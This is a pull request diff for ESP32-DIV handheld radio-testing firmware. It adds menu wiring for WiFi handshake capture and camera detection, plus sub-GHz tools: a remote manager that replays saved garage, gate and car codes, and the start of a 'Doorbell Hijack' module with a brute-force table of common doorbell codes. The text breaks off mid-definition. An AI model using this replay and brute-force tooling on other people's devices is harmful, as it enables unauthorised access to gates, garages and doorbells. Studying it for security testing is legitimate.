### PR TITLE
Add IP5306 battery fix, Deauther fix, camera detector, handshake capture, and 4 SubGHz tools

### DIFF
--- a/ESP32-DIV/ESP32-DIV.ino
+++ b/ESP32-DIV/ESP32-DIV.ino
@@ -70,7 +70,7 @@ const char *submenu_items[NUM_SUBMENU_ITEMS] = {
 // WiFi submenu is split across two pages (features after Hidden SSID on page 2).
 // Bottom row: icon | Main Menu                 Next/Prev Page | icon
 static constexpr int WIFI_PAGE0_FEATURES = 8;
-static constexpr int WIFI_PAGE1_FEATURES = 3;
+static constexpr int WIFI_PAGE1_FEATURES = 5;
 static int wifi_submenu_page = 0;
 
 const char *wifi_page0_items[WIFI_PAGE0_FEATURES] = {
@@ -86,7 +86,9 @@ const char *wifi_page0_items[WIFI_PAGE0_FEATURES] = {
 const char *wifi_page1_items[WIFI_PAGE1_FEATURES] = {
     "WPS Scanner",
     "ARP Scanner",
-    "Karma Attack"};
+    "Karma Attack",
+    "Cam Detector",
+    "Handshake"};
 
 // Bluetooth submenu uses the same paged footer layout as WiFi.
 static constexpr int BT_PAGE0_FEATURES = 8;
@@ -119,13 +121,17 @@ const char *nrf_submenu_items[nrf_NUM_SUBMENU_ITEMS] = {
     "MouseJack Inject",
     "Back to Main Menu"};
 
-const int subghz_NUM_SUBMENU_ITEMS = 6;
+const int subghz_NUM_SUBMENU_ITEMS = 10;
 const char *subghz_submenu_items[subghz_NUM_SUBMENU_ITEMS] = {
     "Replay Attack",
     "SubGHz Jammer",
     "De Bruijn / Brute",
     "Jamming Detector",
     "Saved Profile",
+    "RF Cloner",
+    "Bug Detector",
+    "Doorbell Hijack",
+    "Remote Manager",
     "Back to Main Menu"};
 
 const int tools_NUM_SUBMENU_ITEMS = 5;
@@ -222,7 +228,9 @@ const unsigned char *wifi_page0_icons[WIFI_PAGE0_FEATURES] = {
 const unsigned char *wifi_page1_icons[WIFI_PAGE1_FEATURES] = {
     bitmap_icon_key,
     bitmap_icon_list,
-    bitmap_icon_devil
+    bitmap_icon_devil,
+    bitmap_icon_eye2,
+    bitmap_icon_key
 };
 
 const unsigned char *bluetooth_page0_icons[BT_PAGE0_FEATURES] = {
@@ -256,6 +264,10 @@ const unsigned char *subghz_submenu_icons[subghz_NUM_SUBMENU_ITEMS] = {
     bitmap_icon_graph_self_loop,
     bitmap_icon_Voice_Id,
     bitmap_icon_list,
+    bitmap_icon_follow,
+    bitmap_icon_eye2,
+    bitmap_icon_wifi,
+    bitmap_icon_sdcard,
     bitmap_icon_go_back
 };
 
@@ -1574,6 +1586,74 @@ void handleWiFiSubmenuButtons() {
                 delay(200);
             }
         }
+        // Cam Detector (page 1, index 3)
+        if (wifi_submenu_page == 1 && current_submenu_index == 3) {
+            current_submenu_index = 3;
+            in_sub_menu = true;
+            feature_active = true;
+            feature_exit_requested = false;
+            CameraDetector::camDetectorSetup();
+            while (wifi_submenu_page == 1 && current_submenu_index == 3 && !feature_exit_requested) {
+                current_submenu_index = 3;
+                in_sub_menu = true;
+                CameraDetector::camDetectorLoop();
+                if (isButtonPressed(BTN_SELECT) || featureExitButtonPressed()) {
+                    in_sub_menu = true;
+                    is_main_menu = false;
+                    submenu_initialized = false;
+                    feature_active = false;
+                    feature_exit_requested = false;
+                    displaySubmenu();
+                    delay(200);
+                    while (isButtonPressed(BTN_SELECT)) {
+                    }
+                    break;
+                }
+            }
+            if (feature_exit_requested) {
+                in_sub_menu = true;
+                is_main_menu = false;
+                submenu_initialized = false;
+                feature_active = false;
+                feature_exit_requested = false;
+                displaySubmenu();
+                delay(200);
+            }
+        }
+        // Handshake Capture (page 1, index 4)
+        if (wifi_submenu_page == 1 && current_submenu_index == 4) {
+            current_submenu_index = 4;
+            in_sub_menu = true;
+            feature_active = true;
+            feature_exit_requested = false;
+            HandshakeCapture::hsCaptureSetup();
+            while (wifi_submenu_page == 1 && current_submenu_index == 4 && !feature_exit_requested) {
+                current_submenu_index = 4;
+                in_sub_menu = true;
+                HandshakeCapture::hsCaptureLoop();
+                if (isButtonPressed(BTN_SELECT) || featureExitButtonPressed()) {
+                    in_sub_menu = true;
+                    is_main_menu = false;
+                    submenu_initialized = false;
+                    feature_active = false;
+                    feature_exit_requested = false;
+                    displaySubmenu();
+                    delay(200);
+                    while (isButtonPressed(BTN_SELECT)) {
+                    }
+                    break;
+                }
+            }
+            if (feature_exit_requested) {
+                in_sub_menu = true;
+                is_main_menu = false;
+                submenu_initialized = false;
+                feature_active = false;
+                feature_exit_requested = false;
+                displaySubmenu();
+                delay(200);
+            }
+        }
     }
 
     if (!feature_active) {
@@ -1957,6 +2037,70 @@ void handleWiFiSubmenuButtons() {
                         current_submenu_index = 2;
                         in_sub_menu = true;
                         KarmaAttack::karmaLoop();
+                        if (isButtonPressed(BTN_SELECT) || featureExitButtonPressed()) {
+                            in_sub_menu = true;
+                            is_main_menu = false;
+                            submenu_initialized = false;
+                            feature_active = false;
+                            feature_exit_requested = false;
+                            displaySubmenu();
+                            delay(200);
+                            while (isButtonPressed(BTN_SELECT)) {
+                            }
+                            break;
+                        }
+                    }
+                    if (feature_exit_requested) {
+                        in_sub_menu = true;
+                        is_main_menu = false;
+                        submenu_initialized = false;
+                        feature_active = false;
+                        feature_exit_requested = false;
+                        displaySubmenu();
+                        delay(200);
+                    }
+                } else if (wifi_submenu_page == 1 && current_submenu_index == 3) {
+                    current_submenu_index = 3;
+                    in_sub_menu = true;
+                    feature_active = true;
+                    feature_exit_requested = false;
+                    CameraDetector::camDetectorSetup();
+                    while (wifi_submenu_page == 1 && current_submenu_index == 3 && !feature_exit_requested) {
+                        current_submenu_index = 3;
+                        in_sub_menu = true;
+                        CameraDetector::camDetectorLoop();
+                        if (isButtonPressed(BTN_SELECT) || featureExitButtonPressed()) {
+                            in_sub_menu = true;
+                            is_main_menu = false;
+                            submenu_initialized = false;
+                            feature_active = false;
+                            feature_exit_requested = false;
+                            displaySubmenu();
+                            delay(200);
+                            while (isButtonPressed(BTN_SELECT)) {
+                            }
+                            break;
+                        }
+                    }
+                    if (feature_exit_requested) {
+                        in_sub_menu = true;
+                        is_main_menu = false;
+                        submenu_initialized = false;
+                        feature_active = false;
+                        feature_exit_requested = false;
+                        displaySubmenu();
+                        delay(200);
+                    }
+                } else if (wifi_submenu_page == 1 && current_submenu_index == 4) {
+                    current_submenu_index = 4;
+                    in_sub_menu = true;
+                    feature_active = true;
+                    feature_exit_requested = false;
+                    HandshakeCapture::hsCaptureSetup();
+                    while (wifi_submenu_page == 1 && current_submenu_index == 4 && !feature_exit_requested) {
+                        current_submenu_index = 4;
+                        in_sub_menu = true;
+                        HandshakeCapture::hsCaptureLoop();
                         if (isButtonPressed(BTN_SELECT) || featureExitButtonPressed()) {
                             in_sub_menu = true;
                             is_main_menu = false;
@@ -3131,13 +3275,113 @@ void handleSubGHzSubmenuButtons() {
         last_interaction_time = millis();
         delay(200);
 
-        if (current_submenu_index == 5) {
+        if (current_submenu_index == 9) {
             in_sub_menu = false;
             feature_active = false;
             feature_exit_requested = false;
             displayMenu();
             handleButtons();
             is_main_menu = false;
+        }
+
+        if (current_submenu_index == 5) {
+            current_submenu_index = 5;
+            in_sub_menu = true;
+            feature_active = true;
+            feature_exit_requested = false;
+            RfCloner::rfClonerSetup();
+            while (current_submenu_index == 5 && !feature_exit_requested) {
+                current_submenu_index = 5;
+                in_sub_menu = true;
+                RfCloner::rfClonerLoop();
+                if (featureExitButtonPressed()) {
+                    in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                    feature_active = false; feature_exit_requested = false;
+                    displaySubmenu(); delay(200);
+                    while (isButtonPressed(BTN_SELECT)) {}
+                    break;
+                }
+            }
+            if (feature_exit_requested) {
+                in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                feature_active = false; feature_exit_requested = false;
+                displaySubmenu(); delay(200);
+            }
+        }
+
+        if (current_submenu_index == 6) {
+            current_submenu_index = 6;
+            in_sub_menu = true;
+            feature_active = true;
+            feature_exit_requested = false;
+            BugDetector::bugDetectorSetup();
+            while (current_submenu_index == 6 && !feature_exit_requested) {
+                current_submenu_index = 6;
+                in_sub_menu = true;
+                BugDetector::bugDetectorLoop();
+                if (featureExitButtonPressed()) {
+                    in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                    feature_active = false; feature_exit_requested = false;
+                    displaySubmenu(); delay(200);
+                    while (isButtonPressed(BTN_SELECT)) {}
+                    break;
+                }
+            }
+            if (feature_exit_requested) {
+                in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                feature_active = false; feature_exit_requested = false;
+                displaySubmenu(); delay(200);
+            }
+        }
+
+        if (current_submenu_index == 7) {
+            current_submenu_index = 7;
+            in_sub_menu = true;
+            feature_active = true;
+            feature_exit_requested = false;
+            DoorbellHijack::doorbellSetup();
+            while (current_submenu_index == 7 && !feature_exit_requested) {
+                current_submenu_index = 7;
+                in_sub_menu = true;
+                DoorbellHijack::doorbellLoop();
+                if (featureExitButtonPressed()) {
+                    in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                    feature_active = false; feature_exit_requested = false;
+                    displaySubmenu(); delay(200);
+                    while (isButtonPressed(BTN_SELECT)) {}
+                    break;
+                }
+            }
+            if (feature_exit_requested) {
+                in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                feature_active = false; feature_exit_requested = false;
+                displaySubmenu(); delay(200);
+            }
+        }
+
+        if (current_submenu_index == 8) {
+            current_submenu_index = 8;
+            in_sub_menu = true;
+            feature_active = true;
+            feature_exit_requested = false;
+            RemoteManager::remoteMgrSetup();
+            while (current_submenu_index == 8 && !feature_exit_requested) {
+                current_submenu_index = 8;
+                in_sub_menu = true;
+                RemoteManager::remoteMgrLoop();
+                if (featureExitButtonPressed()) {
+                    in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                    feature_active = false; feature_exit_requested = false;
+                    displaySubmenu(); delay(200);
+                    while (isButtonPressed(BTN_SELECT)) {}
+                    break;
+                }
+            }
+            if (feature_exit_requested) {
+                in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                feature_active = false; feature_exit_requested = false;
+                displaySubmenu(); delay(200);
+            }
         }
 
         if (current_submenu_index == 0) {
@@ -3329,13 +3573,105 @@ void handleSubGHzSubmenuButtons() {
                 displaySubmenu();
                 delay(200);
 
-                if (current_submenu_index == 5) {
+                if (current_submenu_index == 9) {
                     in_sub_menu = false;
                     feature_active = false;
                     feature_exit_requested = false;
                     displayMenu();
                     handleButtons();
                     is_main_menu = false;
+                } else if (current_submenu_index == 5) {
+                    current_submenu_index = 5;
+                    in_sub_menu = true;
+                    feature_active = true;
+                    feature_exit_requested = false;
+                    RfCloner::rfClonerSetup();
+                    while (current_submenu_index == 5 && !feature_exit_requested) {
+                        current_submenu_index = 5;
+                        in_sub_menu = true;
+                        RfCloner::rfClonerLoop();
+                        if (featureExitButtonPressed()) {
+                            in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                            feature_active = false; feature_exit_requested = false;
+                            displaySubmenu(); delay(200);
+                            while (isButtonPressed(BTN_SELECT)) {}
+                            break;
+                        }
+                    }
+                    if (feature_exit_requested) {
+                        in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                        feature_active = false; feature_exit_requested = false;
+                        displaySubmenu(); delay(200);
+                    }
+                } else if (current_submenu_index == 6) {
+                    current_submenu_index = 6;
+                    in_sub_menu = true;
+                    feature_active = true;
+                    feature_exit_requested = false;
+                    BugDetector::bugDetectorSetup();
+                    while (current_submenu_index == 6 && !feature_exit_requested) {
+                        current_submenu_index = 6;
+                        in_sub_menu = true;
+                        BugDetector::bugDetectorLoop();
+                        if (featureExitButtonPressed()) {
+                            in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                            feature_active = false; feature_exit_requested = false;
+                            displaySubmenu(); delay(200);
+                            while (isButtonPressed(BTN_SELECT)) {}
+                            break;
+                        }
+                    }
+                    if (feature_exit_requested) {
+                        in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                        feature_active = false; feature_exit_requested = false;
+                        displaySubmenu(); delay(200);
+                    }
+                } else if (current_submenu_index == 7) {
+                    current_submenu_index = 7;
+                    in_sub_menu = true;
+                    feature_active = true;
+                    feature_exit_requested = false;
+                    DoorbellHijack::doorbellSetup();
+                    while (current_submenu_index == 7 && !feature_exit_requested) {
+                        current_submenu_index = 7;
+                        in_sub_menu = true;
+                        DoorbellHijack::doorbellLoop();
+                        if (featureExitButtonPressed()) {
+                            in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                            feature_active = false; feature_exit_requested = false;
+                            displaySubmenu(); delay(200);
+                            while (isButtonPressed(BTN_SELECT)) {}
+                            break;
+                        }
+                    }
+                    if (feature_exit_requested) {
+                        in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                        feature_active = false; feature_exit_requested = false;
+                        displaySubmenu(); delay(200);
+                    }
+                } else if (current_submenu_index == 8) {
+                    current_submenu_index = 8;
+                    in_sub_menu = true;
+                    feature_active = true;
+                    feature_exit_requested = false;
+                    RemoteManager::remoteMgrSetup();
+                    while (current_submenu_index == 8 && !feature_exit_requested) {
+                        current_submenu_index = 8;
+                        in_sub_menu = true;
+                        RemoteManager::remoteMgrLoop();
+                        if (featureExitButtonPressed()) {
+                            in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                            feature_active = false; feature_exit_requested = false;
+                            displaySubmenu(); delay(200);
+                            while (isButtonPressed(BTN_SELECT)) {}
+                            break;
+                        }
+                    }
+                    if (feature_exit_requested) {
+                        in_sub_menu = true; is_main_menu = false; submenu_initialized = false;
+                        feature_active = false; feature_exit_requested = false;
+                        displaySubmenu(); delay(200);
+                    }
                 } else if (current_submenu_index == 0) {
                     current_submenu_index = 0;
                     in_sub_menu = true;

--- a/ESP32-DIV/config.h
+++ b/ESP32-DIV/config.h
@@ -148,6 +148,22 @@ namespace jammingdetector {
   void Setup();
   void Loop();
 }
+namespace RfCloner {
+  void rfClonerSetup();
+  void rfClonerLoop();
+}
+namespace BugDetector {
+  void bugDetectorSetup();
+  void bugDetectorLoop();
+}
+namespace DoorbellHijack {
+  void doorbellSetup();
+  void doorbellLoop();
+}
+namespace RemoteManager {
+  void remoteMgrSetup();
+  void remoteMgrLoop();
+}
 
 /* ───────────── WiFi namespaces ───────────── */
 namespace PacketMonitor {
@@ -201,6 +217,14 @@ namespace ArpScanner {
 namespace KarmaAttack {
   void karmaSetup();
   void karmaLoop();
+}
+namespace CameraDetector {
+  void camDetectorSetup();
+  void camDetectorLoop();
+}
+namespace HandshakeCapture {
+  void hsCaptureSetup();
+  void hsCaptureLoop();
 }
 namespace FirmwareUpdate {
   void updateSetup();

--- a/ESP32-DIV/subghz.cpp
+++ b/ESP32-DIV/subghz.cpp
@@ -4277,3 +4277,1954 @@ void Loop() {
 }
 
 }  // namespace jammingdetector
+
+// ══════════════════════════════════════════════════════════════════
+// Multi-Remote Manager
+// Save and organize captured remotes by category. Quick-fire from a
+// browsable category list instead of scrolling through generic profiles.
+// Stores on SD card at /subghz/remotes/ with category subfolders.
+// ══════════════════════════════════════════════════════════════════
+namespace RemoteManager {
+
+#undef TFT_BLACK
+#define TFT_BLACK FEATURE_BG
+
+static constexpr const char* kRemotesDir = "/subghz/remotes";
+static constexpr int kMaxRemotes = 50;
+static constexpr int kMaxNameLen = 16;
+
+static const char* kCategories[] = {
+  "Garage", "Gate", "Doorbell", "Fan", "Light", "Outlet", "Car", "Other"
+};
+static constexpr int kNumCategories = 8;
+
+struct RemoteEntry {
+  char name[kMaxNameLen];
+  uint32_t frequency;
+  uint32_t value;
+  uint16_t bitLength;
+  uint16_t protocol;
+  uint8_t category;
+  bool valid;
+};
+
+static RemoteEntry s_remotes[kMaxRemotes];
+static int s_remoteCount = 0;
+static int s_selIdx = 0;
+static int s_listPage = 0;
+static uint8_t s_filterCategory = 0;
+static bool s_showAll = true;
+
+RCSwitch mySwitch = RCSwitch();
+
+static constexpr int kHeaderY = 22;
+static constexpr int kRowH = 20;
+static constexpr int kFirstRowY = kHeaderY + 16;
+
+static int rmContentBottom() {
+  return featureHasTouchNavBar() ? touchNavContentBottomY() : 320;
+}
+
+static int rmRowsPerPage() {
+  return max(1, (rmContentBottom() - kFirstRowY) / kRowH);
+}
+
+static void rmInitCC1101(uint32_t freq, bool tx) {
+  reclaimSharedSpiBus();
+  ELECHOUSE_cc1101.setSpiPin(CC1101_SCK, CC1101_MISO, CC1101_MOSI, CC1101_CS);
+  ELECHOUSE_cc1101.setGDO(CC1101_GDO0, CC1101_GDO2);
+  ELECHOUSE_cc1101.Init();
+  ELECHOUSE_cc1101.setModulation(2);
+  ELECHOUSE_cc1101.setRxBW(500.0);
+  ELECHOUSE_cc1101.setMHZ(freq / 1000000.0);
+  if (tx) ELECHOUSE_cc1101.SetTx();
+  else ELECHOUSE_cc1101.SetRx();
+}
+
+static String rmCategoryDir(uint8_t cat) {
+  if (cat < kNumCategories) {
+    return String(kRemotesDir) + "/" + kCategories[cat];
+  }
+  return String(kRemotesDir) + "/Other";
+}
+
+static bool rmMountSD() {
+  restoreSdAfterSharedSpi();
+  return isSDCardAvailable();
+}
+
+static void rmLoadRemotes() {
+  s_remoteCount = 0;
+  memset(s_remotes, 0, sizeof(s_remotes));
+
+  if (!rmMountSD()) return;
+
+  if (!SD.exists(kRemotesDir)) SD.mkdir(kRemotesDir);
+
+  for (uint8_t c = 0; c < kNumCategories && s_remoteCount < kMaxRemotes; c++) {
+    String dir = rmCategoryDir(c);
+    if (!SD.exists(dir.c_str())) continue;
+
+    File dirFile = SD.open(dir.c_str());
+    if (!dirFile || !dirFile.isDirectory()) continue;
+
+    File entry;
+    while ((entry = dirFile.openNextFile()) && s_remoteCount < kMaxRemotes) {
+      if (entry.isDirectory()) { entry.close(); continue; }
+      String name = entry.name();
+      entry.close();
+
+      String path = dir + "/" + name;
+      File f = SD.open(path.c_str(), FILE_READ);
+      if (!f) continue;
+
+      RemoteEntry r = {};
+      r.category = c;
+      r.valid = true;
+
+      if (f.available() >= 12) {
+        f.readBytes((char*)&r.frequency, 4);
+        f.readBytes((char*)&r.value, 4);
+        f.readBytes((char*)&r.bitLength, 2);
+        f.readBytes((char*)&r.protocol, 2);
+      }
+      String fname = name;
+      fname.toUpperCase();
+      if (fname.endsWith(".BIN")) fname = fname.substring(0, fname.length() - 4);
+      strncpy(r.name, fname.c_str(), kMaxNameLen - 1);
+      r.name[kMaxNameLen - 1] = '\0';
+
+      f.close();
+      s_remotes[s_remoteCount++] = r;
+    }
+    dirFile.close();
+  }
+}
+
+static int rmFilteredCount() {
+  if (s_showAll) return s_remoteCount;
+  int count = 0;
+  for (int i = 0; i < s_remoteCount; i++) {
+    if (s_remotes[i].category == (s_filterCategory - 1)) count++;
+  }
+  return count;
+}
+
+static int rmFilteredIndex(int visibleIdx) {
+  if (s_showAll) return visibleIdx;
+  int count = 0;
+  for (int i = 0; i < s_remoteCount; i++) {
+    if (s_remotes[i].category == (s_filterCategory - 1)) {
+      if (count == visibleIdx) return i;
+      count++;
+    }
+  }
+  return -1;
+}
+
+static void rmDrawList() {
+  featureClearContent(TFT_BLACK);
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+
+  tft.setTextColor(FEATURE_TEXT, TFT_BLACK);
+  tft.setCursor(5, kHeaderY);
+  if (s_showAll) {
+    tft.print("All Remotes");
+  } else {
+    tft.print(kCategories[s_filterCategory - 1]);
+  }
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(160, kHeaderY);
+  tft.print(rmFilteredCount());
+  tft.print(" saved");
+
+  int y = kFirstRowY;
+  const int perPage = rmRowsPerPage();
+  const int filteredCount = rmFilteredCount();
+
+  if (filteredCount == 0) {
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.setCursor(20, 80);
+    tft.print("No remotes saved yet.");
+    tft.setCursor(20, 100);
+    tft.print("Use RF Cloner to capture.");
+  } else {
+    for (int vis = 0; vis < perPage && vis < filteredCount; vis++) {
+      int actualIdx = rmFilteredIndex(vis);
+      if (actualIdx < 0) break;
+      const RemoteEntry& r = s_remotes[actualIdx];
+
+      bool isSel = (vis == s_selIdx);
+      uint16_t bg = isSel ? 0x4208 : TFT_BLACK;
+      uint16_t fg = isSel ? ORANGE : TFT_WHITE;
+
+      tft.fillRect(0, y, 240, kRowH - 2, bg);
+      tft.setTextColor(fg, bg);
+      tft.setCursor(3, y + 1);
+      tft.print(isSel ? ">" : " ");
+      tft.setCursor(10, y + 1);
+
+      char nameBuf[kMaxNameLen + 1];
+      strncpy(nameBuf, r.name, kMaxNameLen);
+      nameBuf[kMaxNameLen] = '\0';
+      if (strlen(nameBuf) > 12) {
+        nameBuf[12] = '\0';
+        strcat(nameBuf, "..");
+      }
+      tft.print(nameBuf);
+
+      tft.setTextColor(TFT_CYAN, bg);
+      tft.setCursor(130, y + 1);
+      if (r.category < kNumCategories) {
+        tft.print(kCategories[r.category]);
+      }
+
+      tft.setTextColor(UI_TEXT, bg);
+      tft.setCursor(190, y + 1);
+      tft.print(r.frequency / 1000000.0, 2);
+      tft.print("M");
+
+      y += kRowH;
+    }
+  }
+
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(5, rmContentBottom() - 12);
+  tft.print("UP/DOWN: sel  LEFT: filter  RIGHT: fire");
+
+  if (featureHasTouchNavBar()) {
+    setTouchNavLabels("Filter", "Next", "Exit", "Prev", "Fire");
+  }
+}
+
+static void rmDrawDetail(int actualIdx) {
+  if (actualIdx < 0 || actualIdx >= s_remoteCount) return;
+  const RemoteEntry& r = s_remotes[actualIdx];
+
+  featureClearContent(TFT_BLACK);
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+
+  tft.setTextColor(FEATURE_TEXT, TFT_BLACK);
+  tft.setCursor(5, kHeaderY);
+  tft.print("Remote Details");
+
+  int y = kHeaderY + 16;
+  tft.setTextColor(TFT_WHITE, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("Name: ");
+  tft.setTextColor(TFT_YELLOW, TFT_BLACK);
+  tft.print(r.name);
+  y += 14;
+
+  tft.setTextColor(TFT_WHITE, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("Category: ");
+  tft.setTextColor(TFT_CYAN, TFT_BLACK);
+  if (r.category < kNumCategories) tft.print(kCategories[r.category]);
+  y += 14;
+
+  tft.setTextColor(TFT_WHITE, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("Freq: ");
+  tft.print(r.frequency / 1000000.0, 3);
+  tft.print(" MHz");
+  y += 14;
+
+  tft.setTextColor(TFT_WHITE, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("Value: 0x");
+  char hexBuf[16];
+  snprintf(hexBuf, sizeof(hexBuf), "%lX", (unsigned long)r.value);
+  tft.print(hexBuf);
+  y += 14;
+
+  tft.setTextColor(TFT_WHITE, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("Bits: ");
+  tft.print(r.bitLength);
+  tft.print("  Proto: ");
+  tft.print(r.protocol);
+  y += 20;
+
+  tft.setTextColor(TFT_GREEN, TFT_BLACK);
+  tft.setCursor(5, y);
+  tft.print("RIGHT: Transmit  LEFT: Back");
+
+  if (featureHasTouchNavBar()) {
+    setTouchNavLabels("Back", "", "Exit", "", "Fire");
+  }
+}
+
+static void rmTransmit(int actualIdx) {
+  if (actualIdx < 0 || actualIdx >= s_remoteCount) return;
+  const RemoteEntry& r = s_remotes[actualIdx];
+
+  rmInitCC1101(r.frequency, true);
+  mySwitch.enableTransmit(SUBGHZ_TX_PIN);
+  mySwitch.setProtocol(r.protocol);
+  mySwitch.send(r.value, r.bitLength);
+  delay(50);
+  mySwitch.send(r.value, r.bitLength);
+  mySwitch.disableTransmit();
+
+  ELECHOUSE_cc1101.SetRx();
+  restoreSdAfterSharedSpi();
+}
+
+static bool s_inDetailView = false;
+static int s_detailActualIdx = -1;
+
+void remoteMgrSetup() {
+  pauseBackgroundRadioTasks();
+  setTouchButtonInputEnabled(true);
+  featureClearContent(TFT_BLACK);
+
+  float battV = readBatteryVoltage();
+  drawStatusBar(battV, true);
+  redrawTouchButtonBar();
+
+#if HAS_PCF8574_BUTTONS
+  pcf.pinMode(BTN_UP, INPUT_PULLUP);
+  pcf.pinMode(BTN_DOWN, INPUT_PULLUP);
+  pcf.pinMode(BTN_RIGHT, INPUT_PULLUP);
+  pcf.pinMode(BTN_LEFT, INPUT_PULLUP);
+#endif
+
+  setupTouchscreen();
+
+  s_selIdx = 0;
+  s_listPage = 0;
+  s_showAll = true;
+  s_filterCategory = 0;
+  s_inDetailView = false;
+  s_detailActualIdx = -1;
+
+  rmLoadRemotes();
+  rmDrawList();
+  redrawTouchButtonBar();
+}
+
+void remoteMgrLoop() {
+  if (feature_active && (isButtonPressed(BTN_SELECT) || featureExitButtonPressed())) {
+    feature_exit_requested = true;
+    return;
+  }
+
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+  updateStatusBar();
+
+  if (s_inDetailView) {
+    if (isButtonPressedEdge(BTN_LEFT) ||
+        (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_LEFT))) {
+      s_inDetailView = false;
+      rmDrawList();
+      redrawTouchButtonBar();
+    }
+    if (isButtonPressedEdge(BTN_RIGHT) ||
+        (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_RIGHT))) {
+      rmTransmit(s_detailActualIdx);
+      tft.fillRect(5, 180, 230, 20, 0x0400);
+      tft.setTextColor(TFT_GREEN, 0x0400);
+      tft.setTextFont(2);
+      tft.setCursor(30, 182);
+      tft.print("TRANSMITTED!");
+      tft.setTextFont(1);
+      delay(800);
+      rmDrawDetail(s_detailActualIdx);
+      redrawTouchButtonBar();
+    }
+    delay(50);
+    return;
+  }
+
+  const int filteredCount = rmFilteredCount();
+  const int perPage = rmRowsPerPage();
+
+  if (isButtonPressedEdge(BTN_UP) && s_selIdx > 0) {
+    s_selIdx--;
+    rmDrawList();
+    redrawTouchButtonBar();
+  }
+  if (isButtonPressedEdge(BTN_DOWN) && s_selIdx < filteredCount - 1) {
+    s_selIdx++;
+    rmDrawList();
+    redrawTouchButtonBar();
+  }
+  if (isButtonPressedEdge(BTN_LEFT) ||
+      (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_LEFT))) {
+    s_filterCategory = (s_filterCategory + 1) % (kNumCategories + 1);
+    s_showAll = (s_filterCategory == 0);
+    s_selIdx = 0;
+    rmDrawList();
+    redrawTouchButtonBar();
+  }
+  if (isButtonPressedEdge(BTN_RIGHT) ||
+      (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_RIGHT))) {
+    int actualIdx = rmFilteredIndex(s_selIdx);
+    if (actualIdx >= 0) {
+      s_detailActualIdx = actualIdx;
+      s_inDetailView = true;
+      rmDrawDetail(actualIdx);
+      redrawTouchButtonBar();
+    }
+  }
+
+  delay(30);
+}
+
+}  // namespace RemoteManager
+
+
+// ============================================================================
+//  Wireless Doorbell Hijack
+//  Capture / Replay / Brute common doorbell codes on 433.92 MHz (default).
+//  BTN_LEFT  = CAPTURE mode toggle
+//  BTN_RIGHT = REPLAY (single ring of captured code)
+//  BTN_DOWN  = BRUTE  (cycle common doorbell codes)
+//  BTN_UP    = change frequency (next in list)
+//  BTN_SELECT/Exit = leave feature
+// ============================================================================
+
+namespace DoorbellHijack {
+
+static constexpr uint8_t DH_RX_PIN = SUBGHZ_RX_PIN;
+static constexpr uint8_t DH_TX_PIN = SUBGHZ_TX_PIN;
+
+static const uint32_t kDoorbellFreqList[] = {
+    300000000, 303875000, 304250000, 310000000, 314000000, 315000000,
+    318000000, 390000000, 418000000, 433075000, 433420000, 433920000,
+    434420000, 434775000, 438900000, 868350000, 915000000, 925000000
+};
+static constexpr int kDoorbellFreqCount =
+    (int)(sizeof(kDoorbellFreqList) / sizeof(kDoorbellFreqList[0]));
+
+// Common fixed doorbell codes observed in the wild (value, bitLength).
+struct DoorbellCode {
+  uint32_t value;
+  uint8_t  bits;
+};
+
+static const DoorbellCode kBruteCodes[] = {
+  { 0x1,    8 }, { 0x2,    8 }, { 0x55,   8 }, { 0xAA,   8 },
+  { 0xFF,   8 }, { 0x0,    8 }, { 0x3,    8 }, { 0xF,    8 },
+  { 0x10,   8 }, { 0x33,   8 }, { 0xCC,   8 }, { 0x80,   8 },
+  { 0x155, 12 }, { 0x2AA, 12 }, { 0x3FF, 12 }, { 0x7FF, 12 },
+  { 0xFFF, 12 }, { 0x800, 12 }, { 0x555, 12 }, { 0xAAA, 12 },
+  { 0x1FF, 12 }, { 0x5,   12 }, { 0xA,   12 }, { 0x50,  12 }
+};
+static constexpr int kBruteCodeCount =
+    (int)(sizeof(kBruteCodes) / sizeof(kBruteCodes[0]));
+
+static RCSwitch s_dhSwitch;
+
+enum DhMode : uint8_t { DH_CAPTURE = 0, DH_REPLAY = 1 };
+
+static DhMode    s_mode          = DH_CAPTURE;
+static int       s_freqIdx       = 11;   // 433.920 MHz
+static uint32_t  s_capValue      = 0;
+static uint16_t  s_capBitLen     = 0;
+static uint16_t  s_capProtocol   = 0;
+static uint32_t  s_ringCount     = 0;
+static bool      s_rxArmed       = false;
+static bool      s_uiDrawn       = false;
+static bool      s_bruteRunning  = false;
+static int       s_bruteIdx      = 0;
+static uint32_t  s_lastBruteMs   = 0;
+static unsigned long s_lastDebounce = 0;
+static constexpr unsigned long kDhDebounceMs = 200;
+
+static String    s_lastStatus;   // transient status line text
+static uint32_t  s_statusUntilMs = 0;
+
+struct __attribute__((packed)) DoorbellCapture {
+  uint32_t frequency;
